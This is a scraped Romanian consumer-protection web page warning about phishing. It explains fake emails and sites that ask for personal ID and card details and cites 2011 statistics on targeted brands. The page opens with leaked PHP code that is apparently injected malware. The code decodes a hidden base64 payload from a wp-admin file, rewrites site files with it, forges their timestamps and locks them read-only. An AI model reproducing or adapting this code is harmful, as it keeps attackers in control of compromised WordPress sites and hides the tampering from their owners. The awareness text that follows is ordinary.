$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Protectia-Consumatorilor.ro-o9atitudine! Afla totul despre PHISHING – O noua atitudine

Exemple se cere CNP, Contul Cardului Primiţi un e-mail, fără să-l fi solicitat în prealabil, care pretinde că provine de la o companie cunoscuta. De fapt, se realizeaza o pagina de web falsa si printr-un mail credibil sunteti redirectionati spre aceasta. Trebuie sa tineti cont de faptul ca organizatiile nu trimit niciodata astfel de mesaje, care solicita informatii personale.

Conform unui studiu Kaspersky Lab, in iunie 2011, Pay Pal este tinta atacurilor de phishing (44,73% din atacuri), urmat de eBay cu 9,54%. Dezvoltarea retelelor sociale a atras si phising-ul. Atacurile catre Facebook a crescut cu 4% fata de 2010.

By o9admin